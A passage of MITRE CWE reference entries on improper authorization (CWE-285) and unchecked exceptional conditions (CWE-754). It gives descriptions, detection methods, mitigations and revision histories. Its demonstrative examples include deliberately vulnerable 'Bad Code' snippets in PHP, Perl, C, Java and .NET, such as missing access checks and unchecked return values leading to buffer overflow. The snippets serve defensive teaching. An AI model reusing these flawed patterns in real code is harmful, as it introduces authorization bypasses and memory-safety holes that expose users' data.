Mapped Taxonomy NameNode IDFitMapped Node Name
WASC21Insufficient Anti-Automation
+ References
Web Application Security Consortium. "Insufficient Anti-automation". <http://projects.webappsec.org/Insufficient+Anti-automation>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
2010-01-15MITREInternal CWE Team
New entry to handle anti-automation as identified in WASC.
Modifications
Modification DateModifierOrganizationSource
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships

CWE-285: Improper Authorization

Weakness ID: 285
Abstraction: Class
Status: Draft
Presentation Filter:
+ Description

Description Summary

The software does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action.

Extended Description

Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user's privileges and any permissions or other access-control specifications that apply to the resource.

When access control checks are not applied consistently - or not at all - users are able to access data or perform actions that they should not be allowed to perform. This can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code execution.

+ Alternate Terms
AuthZ:

"AuthZ" is typically used as an abbreviation of "authorization" within the web application security community. It is also distinct from "AuthC," which is an abbreviation of "authentication." The use of "Auth" as an abbreviation is discouraged, since it could be used for either authentication or authorization.

+ Time of Introduction
  • Architecture and Design
  • Implementation
  • Operation
+ Applicable Platforms

Languages

Language-independent

Technology Classes

Web-Server: (Often)

Database-Server: (Often)

+ Modes of Introduction

A developer may introduce authorization weaknesses because of a lack of understanding about the underlying technologies. For example, a developer may assume that attackers cannot modify certain inputs such as headers or cookies.

Authorization weaknesses may arise when a single-user application is ported to a multi-user environment.

+ Common Consequences
ScopeEffect
Confidentiality

Technical Impact: Read application data; Read files or directories

An attacker could read sensitive data, either by reading the data directly from a data store that is not properly restricted, or by accessing insufficiently-protected, privileged functionality to read the data.

Integrity

Technical Impact: Modify application data; Modify files or directories

An attacker could modify sensitive data, either by writing the data directly to a data store that is not properly restricted, or by accessing insufficiently-protected, privileged functionality to write the data.

Access Control

Technical Impact: Gain privileges / assume identity

An attacker could gain privileges by modifying or reading critical data directly, or by accessing insufficiently-protected, privileged functionality.

+ Likelihood of Exploit

High

+ Detection Methods

Automated Static Analysis

Automated static analysis is useful for detecting commonly-used idioms for authorization. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authorization libraries.

Generally, automated static analysis tools have difficulty detecting custom authorization schemes. In addition, the software's design may include some functionality that is accessible to any user and does not require an authorization check; an automated technique that detects the absence of authorization may report false positives.

Effectiveness: Limited

Automated Dynamic Analysis

Automated dynamic analysis may find many or all possible interfaces that do not require authorization, but manual analysis is required to determine if the lack of authorization violates business logic

Manual Analysis

This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.

Specifically, manual static analysis is useful for evaluating the correctness of custom authorization mechanisms.

Effectiveness: Moderate

These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. However, manual efforts might not achieve desired code coverage within limited time constraints.

Manual Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies

Effectiveness: SOAR Partial

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Web Application Scanner

  • Web Services Scanner

  • Database Scanners

Effectiveness: SOAR Partial

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Host Application Interface Scanner

  • Fuzz Tester

  • Framework-based Fuzzer

  • Forced Path Execution

  • Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious

Effectiveness: SOAR Partial

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Focused Manual Spotcheck - Focused manual analysis of source

  • Manual Source Code Review (not inspections)

Effectiveness: SOAR Partial

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR Partial

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Formal Methods / Correct-By-Construction

Cost effective for partial coverage:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

Effectiveness: SOAR High

+ Demonstrative Examples

Example 1

This function runs an arbitrary SQL query on a given database, returning the result of the query.

(Bad Code)
Example Language: PHP 
function runEmployeeQuery($dbName, $name){
mysql_select_db($dbName,$globalDbHandle) or die("Could not open Database".$dbName);
//Use a prepared statement to avoid CWE-89
$preparedStatement = $globalDbHandle->prepare('SELECT * FROM employees WHERE name = :name');
$preparedStatement->execute(array(':name' => $name));
return $preparedStatement->fetchAll();
}
/.../
$employeeRecord = runEmployeeQuery('EmployeeDB',$_GET['EmployeeName']);

While this code is careful to avoid SQL Injection, the function does not confirm the user sending the query is authorized to do so. An attacker may be able to obtain sensitive employee information from the database.

Example 2

The following program could be part of a bulletin board system that allows users to send private messages to each other. This program intends to authenticate the user before deciding whether a private message should be displayed. Assume that LookupMessageObject() ensures that the $id argument is numeric, constructs a filename based on that id, and reads the message details from that file. Also assume that the program stores all private messages for all users in the same directory.

(Bad Code)
Example Language: Perl 
sub DisplayPrivateMessage {
my($id) = @_;
my $Message = LookupMessageObject($id);
print "From: " . encodeHTML($Message->{from}) . "<br>\n";
print "Subject: " . encodeHTML($Message->{subject}) . "\n";
print "<hr>\n";
print "Body: " . encodeHTML($Message->{body}) . "\n";
}

my $q = new CGI;
# For purposes of this example, assume that CWE-309 and
# CWE-523 do not apply.
if (! AuthenticateUser($q->param('username'), $q->param('password'))) {
ExitError("invalid username or password");
}

my $id = $q->param('id');
DisplayPrivateMessage($id);

While the program properly exits if authentication fails, it does not ensure that the message is addressed to the user. As a result, an authenticated attacker could provide any arbitrary identifier and read private messages that were intended for other users.

One way to avoid this problem would be to ensure that the "to" field in the message object matches the username of the authenticated user.

+ Observed Examples
ReferenceDescription
Web application does not restrict access to admin scripts, allowing authenticated users to reset administrative passwords.
Web application does not restrict access to admin scripts, allowing authenticated users to modify passwords of other users.
Web application stores database file under the web root with insufficient access control (CWE-219), allowing direct request.
Terminal server does not check authorization for guest access.
Database server does not use appropriate privileges for certain sensitive operations.
Gateway uses default "Allow" configuration for its authorization settings.
Chain: product does not properly interpret a configuration option for a system group, allowing users to gain privileges.
Chain: SNMP product does not properly parse a configuration option for which hosts are allowed to connect, allowing unauthorized IP addresses to connect.
System monitoring software allows users to bypass authorization by creating custom forms.
Chain: reliance on client-side security (CWE-602) allows attackers to bypass authorization using a custom client.
Chain: product does not properly handle wildcards in an authorization policy list, allowing unintended access.
Content management system does not check access permissions for private files, allowing others to view those files.
ACL-based protection mechanism treats negative access rights as if they are positive, allowing bypass of intended restrictions.
Product does not check the ACL of a page accessed using an "include" directive, allowing attackers to read unauthorized files.
Default ACL list for a DNS server does not set certain ACLs, allowing unauthorized DNS queries.
Product relies on the X-Forwarded-For HTTP header for authorization, allowing unintended access by spoofing the header.
OS kernel does not check for a certain privilege before setting ACLs for files.
Chain: file-system code performs an incorrect comparison (CWE-697), preventing default ACLs from being properly applied.
Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions.
+ Potential Mitigations

Phase: Architecture and Design

Divide the software into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) to enforce the roles at the appropriate boundaries.

Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.

Phase: Architecture and Design

Ensure that you perform access control checks related to your business logic. These checks may be different than the access control checks that you apply to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor.

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

For example, consider using authorization frameworks such as the JAAS Authorization Framework [R.285.5] and the OWASP ESAPI Access Control feature [R.285.4].

Phase: Architecture and Design

For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.

One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.

Phases: System Configuration; Installation

Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.

+ Background Details

An access control list (ACL) represents who/what has permissions to a given object. Different operating systems implement (ACLs) in different ways. In UNIX, there are three types of permissions: read, write, and execute. Users are divided into three classes for file access: owner, group owner, and all other users where each class has a separate set of rights. In Windows NT, there are four basic types of permissions for files: "No access", "Read access", "Change access", and "Full control". Windows NT extends the concept of three types of users in UNIX to include a list of users and groups along with their associated permissions. A user can create an object (file) and assign specified permissions to that object.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory254Security Features
Seven Pernicious Kingdoms (primary)700
ChildOfWeakness ClassWeakness Class284Improper Access Control
Development Concepts (primary)699
Research Concepts (primary)1000
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfCategoryCategory721OWASP Top Ten 2007 Category A10 - Failure to Restrict URL Access
Weaknesses in OWASP Top Ten (2007) (primary)629
ChildOfCategoryCategory723OWASP Top Ten 2004 Category A2 - Broken Access Control
Weaknesses in OWASP Top Ten (2004) (primary)711
ChildOfCategoryCategory7532009 Top 25 - Porous Defenses
Weaknesses in the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)750
ChildOfCategoryCategory8032010 Top 25 - Porous Defenses
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory817OWASP Top Ten 2010 Category A8 - Failure to Restrict URL Access
Weaknesses in OWASP Top Ten (2010) (primary)809
ChildOfCategoryCategory840Business Logic Errors
Development Concepts699
ChildOfCategoryCategory935OWASP Top Ten 2013 Category A7 - Missing Function Level Access Control
Weaknesses in OWASP Top Ten (2013) (primary)928
ChildOfCategoryCategory945SFP Secondary Cluster: Insecure Resource Access
Software Fault Pattern (SFP) Clusters (primary)888
ParentOfWeakness VariantWeakness Variant219Sensitive Data Under Web Root
Research Concepts (primary)1000
ParentOfWeakness ClassWeakness Class732Incorrect Permission Assignment for Critical Resource
Research Concepts (primary)1000
ParentOfWeakness ClassWeakness Class862Missing Authorization
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness ClassWeakness Class863Incorrect Authorization
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant926Improper Export of Android Application Components
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant927Use of Implicit Intent for Sensitive Communication
Development Concepts (primary)699
Research Concepts (primary)1000
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsMissing Access Control
OWASP Top Ten 2007A10CWE More SpecificFailure to Restrict URL Access
OWASP Top Ten 2004A2CWE More SpecificBroken Access Control
Software Fault PatternsSFP35Insecure resource access
+ References
[R.285.1] NIST. "Role Based Access Control and Role Based Security". <http://csrc.nist.gov/groups/SNS/rbac/>.
[R.285.2] [REF-11] M. Howard and D. LeBlanc. "Writing Secure Code". Chapter 4, "Authorization" Page 114; Chapter 6, "Determining Appropriate Access Control" Page 171. 2nd Edition. Microsoft. 2002.
[R.285.3] Frank Kim. "Top 25 Series - Rank 5 - Improper Access Control (Authorization)". SANS Software Security Institute. 2010-03-04. <http://blogs.sans.org/appsecstreetfighter/2010/03/04/top-25-series-rank-5-improper-access-control-authorization/>.
[R.285.4] [REF-21] OWASP. "OWASP Enterprise Security API (ESAPI) Project". <http://www.owasp.org/index.php/ESAPI>.
[R.285.5] [REF-23] Rahul Bhattacharjee. "Authentication using JAAS". <http://www.javaranch.com/journal/2008/04/authentication-using-JAAS.html>.
[R.285.6] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 2, "Common Vulnerabilities of Authorization", Page 39.. 1st Edition. Addison Wesley. 2006.
[R.285.7] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 11, "ACL Inheritance", Page 649.. 1st Edition. Addison Wesley. 2006.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-08-15VeracodeExternal
Suggested OWASP Top Ten 2004 mapping
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings
2009-01-12CWE Content TeamMITREInternal
updated Common_Consequences, Description, Likelihood_of_Exploit, Name, Other_Notes, Potential_Mitigations, References, Relationships
2009-03-10CWE Content TeamMITREInternal
updated Potential_Mitigations
2009-05-27CWE Content TeamMITREInternal
updated Description, Related_Attack_Patterns
2009-07-27CWE Content TeamMITREInternal
updated Relationships
2009-10-29CWE Content TeamMITREInternal
updated Type
2009-12-28CWE Content TeamMITREInternal
updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Modes_of_Introduction, Observed_Examples, Relationships
2010-02-16CWE Content TeamMITREInternal
updated Alternate_Terms, Detection_Factors, Potential_Mitigations, References, Relationships
2010-04-05CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences, References, Relationships
2010-09-27CWE Content TeamMITREInternal
updated Description
2011-03-24
(Critical)
CWE Content TeamMITREInternal
Changed name and description; clarified difference between "access control" and "authorization."
2011-03-29CWE Content TeamMITREInternal
updated Background_Details, Demonstrative_Examples, Description, Name, Relationships
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Observed_Examples, Relationships
2012-05-11CWE Content TeamMITREInternal
updated Demonstrative_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2013-07-17CWE Content TeamMITREInternal
updated Relationships
2014-07-30CWE Content TeamMITREInternal
updated Detection_Factors, Relationships, Taxonomy_Mappings
2015-12-07CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2009-01-12Missing or Inconsistent Access Control
2011-03-29Improper Access Control (Authorization)

CWE-754: Improper Check for Unusual or Exceptional Conditions

Weakness ID: 754
Abstraction: Class
Status: Incomplete
Presentation Filter:
+ Description

Description Summary

The software does not check or improperly checks for unusual or exceptional conditions that are not expected to occur frequently during day to day operation of the software.

Extended Description

The programmer may assume that certain events or conditions will never occur or do not need to be worried about, such as low memory conditions, lack of access to resources due to restrictive permissions, or misbehaving clients or components. However, attackers may intentionally trigger these unusual conditions, thus violating the programmer's assumptions, possibly introducing instability, incorrect behavior, or a vulnerability.

Note that this entry is not exclusively about the use of exceptions and exception handling, which are mechanisms for both checking and handling unusual or unexpected conditions.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

Language-independent

+ Common Consequences
ScopeEffect
Integrity
Availability

Technical Impact: DoS: crash / exit / restart; Unexpected state

The data which were produced as a result of a function call could be in a bad state upon return. If the return value is not checked, then this bad data may be used in operations, possibly leading to a crash or other unintended behaviors.

+ Likelihood of Exploit

Medium

+ Detection Methods

Automated Static Analysis

Automated static analysis may be useful for detecting unusual conditions involving system resources or common programming idioms, but not for violations of business rules.

Effectiveness: Moderate

Manual Dynamic Analysis

Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application's environment, it may still indicate unexpected conditions that were not handled by the application itself.

+ Demonstrative Examples

Example 1

Consider the following code segment:

(Bad Code)
Example Language:
char buf[10], cp_buf[10];
fgets(buf, 10, stdin);
strcpy(cp_buf, buf);

The programmer expects that when fgets() returns, buf will contain a null-terminated string of length 9 or less. But if an I/O error occurs, fgets() will not null-terminate buf. Furthermore, if the end of the file is reached before any characters are read, fgets() returns without writing anything to buf. In both of these situations, fgets() signals that something unusual has happened by returning NULL, but in this code, the warning will not be noticed. The lack of a null terminator in buf can result in a buffer overflow in the subsequent call to strcpy().

Example 2

The following code does not check to see if memory allocation succeeded before attempting to use the pointer returned by malloc().

(Bad Code)
Example Language:
buf = (char*) malloc(req_size);
strncpy(buf, xfer, req_size);

The traditional defense of this coding error is: "If my program runs out of memory, it will fail. It doesn't matter whether I handle the error or simply allow the program to die with a segmentation fault when it tries to dereference the null pointer." This argument ignores three important considerations:

  • Depending upon the type and size of the application, it may be possible to free memory that is being used elsewhere so that execution can continue.

  • It is impossible for the program to perform a graceful exit if required. If the program is performing an atomic operation, it can leave the system in an inconsistent state.

  • The programmer has lost the opportunity to record diagnostic information. Did the call to malloc() fail because req_size was too large or because there were too many requests being handled at the same time? Or was it caused by a memory leak that has built up over time? Without handling the error, there is no way to know.

Example 3

The following examples read a file into a byte array.

(Bad Code)
Example Language: C# 
char[] byteArray = new char[1024];
for (IEnumerator i=users.GetEnumerator(); i.MoveNext() ;i.Current()) {
String userName = (String) i.Current();
String pFileName = PFILE_ROOT + "/" + userName;
StreamReader sr = new StreamReader(pFileName);
sr.Read(byteArray,0,1024);//the file is always 1k bytes
sr.Close();
processPFile(userName, byteArray);
}
(Bad Code)
Example Language: Java 
FileInputStream fis;
byte[] byteArray = new byte[1024];
for (Iterator i=users.iterator(); i.hasNext();) {
String userName = (String) i.next();
String pFileName = PFILE_ROOT + "/" + userName;
FileInputStream fis = new FileInputStream(pFileName);
fis.read(byteArray); // the file is always 1k bytes
fis.close();
processPFile(userName, byteArray);

The code loops through a set of users, reading a private data file for each user. The programmer assumes that the files are always 1 kilobyte in size and therefore ignores the return value from Read(). If an attacker can create a smaller file, the program will recycle the remainder of the data from the previous user and treat it as though it belongs to the attacker.

Example 4

The following code does not check to see if the string returned by getParameter() is null before calling the member function compareTo(), potentially causing a NULL dereference.

(Bad Code)
Example Language: Java 
String itemName = request.getParameter(ITEM_NAME);
if (itemName.compareTo(IMPORTANT_ITEM) == 0) {
...
}
...

The following code does not check to see if the string returned by the Item property is null before calling the member function Equals(), potentially causing a NULL dereference.

(Bad Code)
Example Language: Java 
String itemName = request.Item(ITEM_NAME);
if (itemName.Equals(IMPORTANT_ITEM)) {
...
}
...

The traditional defense of this coding error is: "I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn't matter whether I handle the error or simply allow the program to die dereferencing a null value." But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved.

Example 5

The following code shows a system property that is set to null and later dereferenced by a programmer who mistakenly assumes it will always be defined.

(Bad Code)
Example Language: Java 
System.clearProperty("os.name");
...
String os = System.getProperty("os.name");
if (os.equalsIgnoreCase("Windows 95")) System.out.println("Not supported");

The traditional defense of this coding error is: "I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn't matter whether I handle the error or simply allow the program to die dereferencing a null value." But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved.

Example 6

The following VB.NET code does not check to make sure that it has read 50 bytes from myfile.txt. This can cause DoDangerousOperation() to operate on an unexpected value.

(Bad Code)
Example Language: .NET 
Dim MyFile As New FileStream("myfile.txt", FileMode.Open, FileAccess.Read, FileShare.Read)
Dim MyArray(50) As Byte
MyFile.Read(MyArray, 0, 50)
DoDangerousOperation(MyArray(20))

In .NET, it is not uncommon for programmers to misunderstand Read() and related methods that are part of many System.IO classes. The stream and reader classes do not consider it to be unusual or exceptional if only a small amount of data becomes available. These classes simply add the small amount of data to the return buffer, and set the return value to the number of bytes or characters read. There is no guarantee that the amount of data returned is equal to the amount of data requested.

Example 7

This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.

(Bad Code)
Example Language:
void host_lookup(char *user_supplied_addr){
struct hostent *hp;
in_addr_t *addr;
char hostname[64];
in_addr_t inet_addr(const char *cp);

/*routine that ensures user_supplied_addr is in the right format for conversion */
validate_addr_form(user_supplied_addr);
addr = inet_addr(user_supplied_addr);
hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);
strcpy(hostname, hp->h_name);
}

If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. When this occurs, a NULL pointer dereference (CWE-476) will occur in the call to strcpy().

Note that this example is also vulnerable to a buffer overflow (see CWE-119).

Example 8

In the following C/C++ example the method outputStringToFile opens a file in the local filesystem and outputs a string to the file. The input parameters output and filename contain the string to output to the file and the name of the file respectively.

(Bad Code)
Example Language: C++ 
int outputStringToFile(char *output, char *filename) {

openFileToWrite(filename);
writeToFile(output);
closeFile(filename);
}

However, this code does not check the return values of the methods openFileToWrite, writeToFile, closeFile to verify that the file was properly opened and closed and that the string was successfully written to the file. The return values for these methods should be checked to determine if the method was successful and allow for detection of errors or unexpected conditions as in the following example.

(Good Code)
Example Language: C++ 
int outputStringToFile(char *output, char *filename) {
int isOutput = SUCCESS;

int isOpen = openFileToWrite(filename);
if (isOpen == FAIL) {
printf("Unable to open file %s", filename);
isOutput = FAIL;
}
else {
int isWrite = writeToFile(output);
if (isWrite == FAIL) {
printf("Unable to write to file %s", filename);
isOutput = FAIL;
}

int isClose = closeFile(filename);
if (isClose == FAIL)
isOutput = FAIL;
}
return isOutput;
}

Example 9

In the following Java example the method readFromFile uses a FileReader object to read the contents of a file. The FileReader object is created using the File object readFile, the readFile object is initialized using the setInputFile method. The setInputFile method should be called before calling the readFromFile method.

(Bad Code)
Example Language: Java 
private File readFile = null;

public void setInputFile(String inputFile) {
// create readFile File object from string containing name of file
}

public void readFromFile() {
try {
reader = new FileReader(readFile);

// read input file

} catch (FileNotFoundException ex) {...}
}

However, the readFromFile method does not check to see if the readFile object is null, i.e. has not been initialized, before creating the FileReader object and reading from the input file. The readFromFile method should verify whether the readFile object is null and output an error message and raise an exception if the readFile object is null, as in the following code.

(Good Code)
Example Language: Java 
private File readFile = null;

public void setInputFile(String inputFile) {
// create readFile File object from string containing name of file
}

public void readFromFile() {
try {
if (readFile == null) {
System.err.println("Input file has not been set, call setInputFile method before calling openInputFile");
throw NullPointerException;
}

reader = new FileReader(readFile);

// read input file

} catch (FileNotFoundException ex) {...}
catch (NullPointerException ex) {...}
}
+ Observed Examples
ReferenceDescription
Unchecked return value leads to resultant integer overflow and code execution.
Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.
Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.
+ Potential Mitigations

Phase: Requirements

Strategy: Language Selection

Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Choose languages with features such as exception handling that force the programmer to anticipate unusual conditions that may generate exceptions. Custom exceptions may need to be developed to handle unusual business-logic conditions. Be careful not to pass sensitive exceptions back to the user (CWE-209, CWE-248).

Phase: Implementation

Check the results of all functions that return a value and verify that the value is expected.

Effectiveness: High

Checking the return value of the function will typically be sufficient, however beware of race conditions (CWE-362) in a concurrent environment.

Phase: Implementation

If using exception handling, catch and throw specific exceptions instead of overly-general exceptions (CWE-396, CWE-397). Catch and handle exceptions as locally as possible so that exceptions do not propagate too far up the call stack (CWE-705). Avoid unchecked or uncaught exceptions where feasible (CWE-248).

Effectiveness: High

Using specific exceptions, and ensuring that exceptions are checked, helps programmers to anticipate and appropriately handle many unusual events that could occur.

Phase: Implementation

Ensure that error messages only contain minimal details that are useful to the intended audience, and nobody else. The messages need to strike the balance between being too cryptic and not being cryptic enough. They should not necessarily reveal the methods that were used to determine the error. Such detailed information can be used to refine the original attack to increase the chances of success.

If errors must be tracked in some detail, capture them in log messages - but consider what could occur if the log messages can be viewed by attackers. Avoid recording highly sensitive information such as passwords in any form. Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a username is valid or not.

Exposing additional information to a potential attacker in the context of an exceptional condition can help the attacker determine what attack vectors are most likely to succeed beyond DoS.

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

Performing extensive input validation does not help with handling unusual conditions, but it will minimize their occurrences and will make it more difficult for attackers to trigger them.

Phases: Architecture and Design; Implementation

If the program must fail, ensure that it fails gracefully (fails closed). There may be a temptation to simply let the program fail poorly in cases such as low memory conditions, but an attacker may be able to assert control before the software has fully exited. Alternately, an uncontrolled failure could cause cascading problems with other downstream components; for example, the program could send a signal to a downstream process so the process immediately knows that a problem has occurred and has a better chance of recovery.

Phase: Architecture and Design

Use system limits, which should help to prevent resource exhaustion. However, the software should still handle low resource conditions since they may still occur.

+ Background Details

Many functions will return some value about the success of their actions. This will alert the program whether or not to handle any errors caused by that function.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory388Error Handling
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfWeakness ClassWeakness Class703Improper Check or Handling of Exceptional Conditions
Development Concepts (primary)699
Research Concepts (primary)1000
ChildOfCategoryCategory742CERT C Secure Coding Section 08 - Memory Management (MEM)
Weaknesses Addressed by the CERT C Secure Coding Standard (primary)734
ChildOfCategoryCategory8022010 Top 25 - Risky Resource Management
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory840Business Logic Errors
Development Concepts699
ChildOfCategoryCategory8672011 Top 25 - Weaknesses On the Cusp
Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary)900
ChildOfCategoryCategory876CERT C++ Secure Coding Section 08 - Memory Management (MEM)
Weaknesses Addressed by the CERT C++ Secure Coding Standard868
ChildOfCategoryCategory880CERT C++ Secure Coding Section 12 - Exceptions and Error Handling (ERR)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory962SFP Secondary Cluster: Unchecked Status Condition
Software Fault Pattern (SFP) Clusters (primary)888
ParentOfWeakness BaseWeakness Base252Unchecked Return Value
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base253Incorrect Check of Function Return Value
Research Concepts1000
ParentOfWeakness BaseWeakness Base273Improper Check for Dropped Privileges
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base354Improper Validation of Integrity Check Value
Research Concepts1000
ParentOfWeakness BaseWeakness Base394Unexpected Status Code or Return Value
Research Concepts (primary)1000
+ Relationship Notes

Sometimes, when a return value can be used to indicate an error, an unchecked return value is a code-layer instance of a missing application-layer check for exceptional conditions. However, return values are not always needed to communicate exceptional conditions. For example, expiration of resources, values passed by reference, asynchronously modified data, sockets, etc. may indicate exceptional conditions without the use of a return value.

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
CERT C++ Secure CodingMEM32-CPPDetect and handle memory allocation errors
CERT C++ Secure CodingERR39-CPPGuarantee exception safety
CERT C Secure CodingMEM32-CDetect and handle memory allocation errors
+ References
[REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 7, "Program Building Blocks" Page 341. 1st Edition. Addison Wesley. 2006.
[REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 1, "Exceptional Conditions," Page 22. 1st Edition. Addison Wesley. 2006.
[REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 11: Failure to Handle Errors Correctly." Page 183. McGraw-Hill. 2010.
Frank Kim. "Top 25 Series - Rank 15 - Improper Check for Unusual or Exceptional Conditions". SANS Software Security Institute. 2010-03-15. <http://blogs.sans.org/appsecstreetfighter/2010/03/15/top-25-series-rank-15-improper-check-for-unusual-or-exceptional-conditions/>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
2009-03-03Internal CWE Team
New entry for reorganization of CWE-703.
Modifications
Modification DateModifierOrganizationSource
2009-07-27CWE Content TeamMITREInternal
updated Relationships
2009-12-28CWE Content TeamMITREInternal
updated Applicable_Platforms, Likelihood_of_Exploit, Time_of_Introduction
2010-02-16CWE Content TeamMITREInternal
updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Name, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationship_Notes, Relationships
2010-04-05CWE Content TeamMITREInternal
updated Demonstrative_Examples, Related_Attack_Patterns
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences, Detection_Factors, Potential_Mitigations, References
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-12-13CWE Content TeamMITREInternal
updated Relationship_Notes
2011-03-29CWE Content TeamMITREInternal
updated Description, Relationships
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-06-27CWE Content TeamMITREInternal
updated Common_Consequences, Related_Attack_Patterns, Relationships
2011-09-13CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Relationships
2012-10-30CWE Content TeamMITREInternal
